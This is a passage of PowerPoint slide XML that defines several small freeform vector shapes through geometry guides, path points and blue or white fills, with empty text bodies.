                  <a:gd name="T55" fmla="*/ 10 h 14"/>
                  <a:gd name="T56" fmla="*/ 3 w 14"/>
                  <a:gd name="T57" fmla="*/ 11 h 14"/>
                  <a:gd name="T58" fmla="*/ 4 w 14"/>
                  <a:gd name="T59" fmla="*/ 13 h 14"/>
                  <a:gd name="T60" fmla="*/ 5 w 14"/>
                  <a:gd name="T61" fmla="*/ 13 h 14"/>
                  <a:gd name="T62" fmla="*/ 6 w 14"/>
                  <a:gd name="T63" fmla="*/ 14 h 14"/>
                  <a:gd name="T64" fmla="*/ 7 w 14"/>
                  <a:gd name="T65" fmla="*/ 14 h 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
                  <a:gd name="T100" fmla="*/ 0 h 14"/>
                  <a:gd name="T101" fmla="*/ 14 w 14"/>
                  <a:gd name="T102" fmla="*/ 14 h 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 h="14">
                    <a:moveTo>
                      <a:pt x="7" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10780" name="Freeform 187"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1894" y="2410"/>
                <a:ext cx="7" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 4 w 7"/>
                  <a:gd name="T3" fmla="*/ 7 h 7"/>
                  <a:gd name="T4" fmla="*/ 5 w 7"/>
                  <a:gd name="T5" fmla="*/ 6 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 7"/>
                  <a:gd name="T7" fmla="*/ 4 h 7"/>
                  <a:gd name="T8" fmla="*/ 7 w 7"/>
                  <a:gd name="T9" fmla="*/ 3 h 7"/>
                  <a:gd name="T10" fmla="*/ 5 w 7"/>
                  <a:gd name="T11" fmla="*/ 2 h 7"/>
                  <a:gd name="T12" fmla="*/ 5 w 7"/>
                  <a:gd name="T13" fmla="*/ 1 h 7"/>
                  <a:gd name="T14" fmla="*/ 4 w 7"/>
                  <a:gd name="T15" fmla="*/ 0 h 7"/>
                  <a:gd name="T16" fmla="*/ 3 w 7"/>
                  <a:gd name="T17" fmla="*/ 0 h 7"/>
                  <a:gd name="T18" fmla="*/ 2 w 7"/>
                  <a:gd name="T19" fmla="*/ 0 h 7"/>
                  <a:gd name="T20" fmla="*/ 1 w 7"/>
                  <a:gd name="T21" fmla="*/ 1 h 7"/>
                  <a:gd name="T22" fmla="*/ 0 w 7"/>
                  <a:gd name="T23" fmla="*/ 2 h 7"/>
                  <a:gd name="T24" fmla="*/ 0 w 7"/>
                  <a:gd name="T25" fmla="*/ 3 h 7"/>
                  <a:gd name="T26" fmla="*/ 0 w 7"/>
                  <a:gd name="T27" fmla="*/ 4 h 7"/>
                  <a:gd name="T28" fmla="*/ 1 w 7"/>
                  <a:gd name="T29" fmla="*/ 6 h 7"/>
                  <a:gd name="T30" fmla="*/ 2 w 7"/>
                  <a:gd name="T31" fmla="*/ 7 h 7"/>
                  <a:gd name="T32" fmla="*/ 3 w 7"/>
                  <a:gd name="T33" fmla="*/ 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7"/>
                  <a:gd name="T53" fmla="*/ 7 w 7"/>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7">
                    <a:moveTo>
                      <a:pt x="3" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10781" name="Freeform 188"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1905" y="2410"/>
                <a:ext cx="6" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 6"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 5 w 6"/>
                  <a:gd name="T3" fmla="*/ 7 h 7"/>
                  <a:gd name="T4" fmla="*/ 6 w 6"/>
                  <a:gd name="T5" fmla="*/ 7 h 7"/>
                  <a:gd name="T6" fmla="*/ 6 w 6"/>
                  <a:gd name="T7" fmla="*/ 6 h 7"/>
                  <a:gd name="T8" fmla="*/ 6 w 6"/>
                  <a:gd name="T9" fmla="*/ 3 h 7"/>
                  <a:gd name="T10" fmla="*/ 6 w 6"/>
                  <a:gd name="T11" fmla="*/ 2 h 7"/>
                  <a:gd name="T12" fmla="*/ 6 w 6"/>
                  <a:gd name="T13" fmla="*/ 1 h 7"/>
                  <a:gd name="T14" fmla="*/ 5 w 6"/>
                  <a:gd name="T15" fmla="*/ 1 h 7"/>
                  <a:gd name="T16" fmla="*/ 4 w 6"/>
                  <a:gd name="T17" fmla="*/ 0 h 7"/>
                  <a:gd name="T18" fmla="*/ 3 w 6"/>
                  <a:gd name="T19" fmla="*/ 1 h 7"/>
                  <a:gd name="T20" fmla="*/ 1 w 6"/>
                  <a:gd name="T21" fmla="*/ 1 h 7"/>
                  <a:gd name="T22" fmla="*/ 0 w 6"/>
                  <a:gd name="T23" fmla="*/ 2 h 7"/>
                  <a:gd name="T24" fmla="*/ 0 w 6"/>
                  <a:gd name="T25" fmla="*/ 3 h 7"/>
                  <a:gd name="T26" fmla="*/ 0 w 6"/>
                  <a:gd name="T27" fmla="*/ 6 h 7"/>
                  <a:gd name="T28" fmla="*/ 1 w 6"/>
                  <a:gd name="T29" fmla="*/ 7 h 7"/>
                  <a:gd name="T30" fmla="*/ 3 w 6"/>
                  <a:gd name="T31" fmla="*/ 7 h 7"/>
                  <a:gd name="T32" fmla="*/ 4 w 6"/>
                  <a:gd name="T33" fmla="*/ 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7"/>
                  <a:gd name="T53" fmla="*/ 6 w 6"/>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7">
                    <a:moveTo>
                      <a:pt x="4" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10782" name="Freeform 189"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1860" y="2317"/>
                <a:ext cx="18" cy="93"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 18"/>
                  <a:gd name="T1" fmla="*/ 2 h 93"/>
                  <a:gd name="T2" fmla="*/ 6 w 18"/>
                  <a:gd name="T3" fmla="*/ 4 h 93"/>
                  <a:gd name="T4" fmla="*/ 3 w 18"/>
                  <a:gd name="T5" fmla="*/ 9 h 93"/>
                  <a:gd name="T6" fmla="*/ 2 w 18"/>
                  <a:gd name="T7" fmla="*/ 17 h 93"/>
                  <a:gd name="T8" fmla="*/ 1 w 18"/>
                  <a:gd name="T9" fmla="*/ 29 h 93"/>
                  <a:gd name="T10" fmla="*/ 0 w 18"/>
                  <a:gd name="T11" fmla="*/ 41 h 93"/>
                  <a:gd name="T12" fmla="*/ 0 w 18"/>
                  <a:gd name="T13" fmla="*/ 58 h 93"/>
                  <a:gd name="T14" fmla="*/ 1 w 18"/>
                  <a:gd name="T15" fmla="*/ 74 h 93"/>
                  <a:gd name="T16" fmla="*/ 4 w 18"/>
                  <a:gd name="T17" fmla="*/ 93 h 93"/>
                  <a:gd name="T18" fmla="*/ 18 w 18"/>
                  <a:gd name="T19" fmla="*/ 93 h 93"/>
                  <a:gd name="T20" fmla="*/ 17 w 18"/>
                  <a:gd name="T21" fmla="*/ 89 h 93"/>
                  <a:gd name="T22" fmla="*/ 16 w 18"/>
                  <a:gd name="T23" fmla="*/ 82 h 93"/>
                  <a:gd name="T24" fmla="*/ 15 w 18"/>
                  <a:gd name="T25" fmla="*/ 71 h 93"/>
                  <a:gd name="T26" fmla="*/ 14 w 18"/>
                  <a:gd name="T27" fmla="*/ 58 h 93"/>
                  <a:gd name="T28" fmla="*/ 13 w 18"/>
                  <a:gd name="T29" fmla="*/ 43 h 93"/>
                  <a:gd name="T30" fmla="*/ 13 w 18"/>
                  <a:gd name="T31" fmla="*/ 27 h 93"/>
                  <a:gd name="T32" fmla="*/ 15 w 18"/>
                  <a:gd name="T33" fmla="*/ 13 h 93"/>
                  <a:gd name="T34" fmla="*/ 18 w 18"/>
                  <a:gd name="T35" fmla="*/ 2 h 93"/>
                  <a:gd name="T36" fmla="*/ 18 w 18"/>
                  <a:gd name="T37" fmla="*/ 2 h 93"/>
                  <a:gd name="T38" fmla="*/ 18 w 18"/>
                  <a:gd name="T39" fmla="*/ 0 h 93"/>
                  <a:gd name="T40" fmla="*/ 18 w 18"/>
                  <a:gd name="T41" fmla="*/ 0 h 93"/>
                  <a:gd name="T42" fmla="*/ 17 w 18"/>
                  <a:gd name="T43" fmla="*/ 0 h 93"/>
                  <a:gd name="T44" fmla="*/ 16 w 18"/>
                  <a:gd name="T45" fmla="*/ 0 h 93"/>
                  <a:gd name="T46" fmla="*/ 14 w 18"/>
                  <a:gd name="T47" fmla="*/ 0 h 93"/>
                  <a:gd name="T48" fmla="*/ 10 w 18"/>
                  <a:gd name="T49" fmla="*/ 0 h 93"/>
                  <a:gd name="T50" fmla="*/ 6 w 18"/>
                  <a:gd name="T51" fmla="*/ 2 h 9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
                  <a:gd name="T79" fmla="*/ 0 h 93"/>
                  <a:gd name="T80" fmla="*/ 18 w 18"/>
                  <a:gd name="T81" fmla="*/ 93 h 9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 h="93">
                    <a:moveTo>
                      <a:pt x="6" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="3F9EFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10783" name="Freeform 190"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1958" y="2306"/>
                <a:ext cx="27" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 27"/>
                  <a:gd name="T1" fmla="*/ 0 h 104"/>
                  <a:gd name="T2" fmla="*/ 25 w 27"/>
                  <a:gd name="T3" fmla="*/ 1 h 104"/>
                  <a:gd name="T4" fmla="*/ 24 w 27"/>
                  <a:gd name="T5" fmla="*/ 3 h 104"/>
                  <a:gd name="T6" fmla="*/ 22 w 27"/>
                  <a:gd name="T7" fmla="*/ 9 h 104"/>
                  <a:gd name="T8" fmla="*/ 20 w 27"/>
                  <a:gd name="T9" fmla="*/ 18 h 104"/>
                  <a:gd name="T10" fmla="*/ 17 w 27"/>
                  <a:gd name="T11" fmla="*/ 31 h 104"/>
                  <a:gd name="T12" fmla="*/ 16 w 27"/>
                  <a:gd name="T13" fmla="*/ 49 h 104"/>
                  <a:gd name="T14" fmla="*/ 17 w 27"/>
                  <a:gd name="T15" fmla="*/ 73 h 104"/>
                  <a:gd name="T16" fmla="*/ 20 w 27"/>
                  <a:gd name="T17" fmla="*/ 104 h 104"/>
                  <a:gd name="T18" fmla="*/ 4 w 27"/>
                  <a:gd name="T19" fmla="*/ 104 h 104"/>
                  <a:gd name="T20" fmla="*/ 4 w 27"/>
                  <a:gd name="T21" fmla="*/ 100 h 104"/>
                  <a:gd name="T22" fmla="*/ 3 w 27"/>
                  <a:gd name="T23" fmla="*/ 92 h 104"/>
                  <a:gd name="T24" fmla="*/ 2 w 27"/>
                  <a:gd name="T25" fmla="*/ 79 h 104"/>
                  <a:gd name="T26" fmla="*/ 1 w 27"/>
                  <a:gd name="T27" fmla="*/ 64 h 104"/>
                  <a:gd name="T28" fmla="*/ 0 w 27"/>
                  <a:gd name="T29" fmla="*/ 47 h 104"/>
                  <a:gd name="T30" fmla="*/ 1 w 27"/>
                  <a:gd name="T31" fmla="*/ 30 h 104"/>
                  <a:gd name="T32" fmla="*/ 3 w 27"/>
                  <a:gd name="T33" fmla="*/ 14 h 104"/>
                  <a:gd name="T34" fmla="*/ 9 w 27"/>
                  <a:gd name="T35" fmla="*/ 0 h 104"/>
                  <a:gd name="T36" fmla="*/ 27 w 27"/>
                  <a:gd name="T37" fmla="*/ 0 h 1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104"/>
                  <a:gd name="T59" fmla="*/ 27 w 27"/>
                  <a:gd name="T60" fmla="*/ 104 h 1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104">
                    <a:moveTo>
                      <a:pt x="27" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="3F9EFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10784" name="Freeform 191"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1860" y="2322"/>
                <a:ext cx="17" cy="82"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 17"/>
                  <a:gd name="T1" fmla="*/ 2 h 82"/>
                  <a:gd name="T2" fmla="*/ 6 w 17"/>
                  <a:gd name="T3" fmla="*/ 4 h 82"/>
                  <a:gd name="T4" fmla="*/ 4 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 82"/>
                  <a:gd name="T6" fmla="*/ 2 w 17"/>
                  <a:gd name="T7" fmla="*/ 15 h 82"/>
                  <a:gd name="T8" fmla="*/ 1 w 17"/>
                  <a:gd name="T9" fmla="*/ 26 h 82"/>
                  <a:gd name="T10" fmla="*/ 0 w 17"/>
                  <a:gd name="T11" fmla="*/ 38 h 82"/>
                  <a:gd name="T12" fmla="*/ 1 w 17"/>
                  <a:gd name="T13" fmla="*/ 50 h 82"/>
                  <a:gd name="T14" fmla="*/ 2 w 17"/>
                  <a:gd name="T15" fmla="*/ 66 h 82"/>
                  <a:gd name="T16" fmla="*/ 4 w 17"/>
                  <a:gd name="T17" fmla="*/ 82 h 82"/>
                  <a:gd name="T18" fmla="*/ 16 w 17"/>
                  <a:gd name="T19" fmla="*/ 81 h 82"/>
                  <a:gd name="T20" fmla="*/ 16 w 17"/>
                  <a:gd name="T21" fmla="*/ 78 h 82"/>
                  <a:gd name="T22" fmla="*/ 15 w 17"/>
                  <a:gd name="T23" fmla="*/ 73 h 82"/>
                  <a:gd name="T24" fmla="*/ 14 w 17"/>
                  <a:gd name="T25" fmla="*/ 62 h 82"/>
                  <a:gd name="T26" fmla="*/ 13 w 17"/>
                  <a:gd name="T27" fmla="*/ 50 h 82"/>
                  <a:gd name="T28" fmla="*/ 11 w 17"/>
                  <a:gd name="T29" fmla="*/ 38 h 82"/>
                  <a:gd name="T30" fmla="*/ 11 w 17"/>
                  <a:gd name="T31" fmla="*/ 25 h 82"/>
                  <a:gd name="T32" fmla="*/ 14 w 17"/>
                  <a:gd name="T33" fmla="*/ 12 h 82"/>
                  <a:gd name="T34" fmla="*/ 17 w 17"/>
                  <a:gd name="T35" fmla="*/ 1 h 82"/>
                  <a:gd name="T36" fmla="*/ 17 w 17"/>
                  <a:gd name="T37" fmla="*/ 1 h 82"/>
                  <a:gd name="T38" fmla="*/ 17 w 17"/>
                  <a:gd name="T39" fmla="*/ 1 h 82"/>
                  <a:gd name="T40" fmla="*/ 17 w 17"/>
                  <a:gd name="T41" fmla="*/ 1 h 82"/>
                  <a:gd name="T42" fmla="*/ 16 w 17"/>
                  <a:gd name="T43" fmla="*/ 0 h 82"/>
                  <a:gd name="T44" fmla="*/ 15 w 17"/>
                  <a:gd name="T45" fmla="*/ 0 h 82"/>
                  <a:gd name="T46" fmla="*/ 13 w 17"/>
                  <a:gd name="T47" fmla="*/ 1 h 82"/>
                  <a:gd name="T48" fmla="*/ 9 w 17"/>
                  <a:gd name="T49" fmla="*/ 1 h 82"/>
                  <a:gd name="T50" fmla="*/ 6 w 17"/>
                  <a:gd name="T51" fmla="*/ 2 h 8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7"/>
                  <a:gd name="T79" fmla="*/ 0 h 82"/>
                  <a:gd name="T80" fmla="*/ 17 w 17"/>
                  <a:gd name="T81" fmla="*/ 82 h 8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7" h="82">
                    <a:moveTo>
                      <a:pt x="6" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="59B2FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10785" name="Freeform 192"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1861" y="2328"/>
                <a:ext cx="14" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 14"/>
                  <a:gd name="T1" fmla="*/ 1 h 69"/>
                  <a:gd name="T2" fmla="*/ 5 w 14"/>
                  <a:gd name="T3" fmla="*/ 2 h 69"/>
                  <a:gd name="T4" fmla="*/ 3 w 14"/>
                  <a:gd name="T5" fmla="*/ 7 h 69"/>
                  <a:gd name="T6" fmla="*/ 2 w 14"/>
                  <a:gd name="T7" fmla="*/ 13 h 69"/>
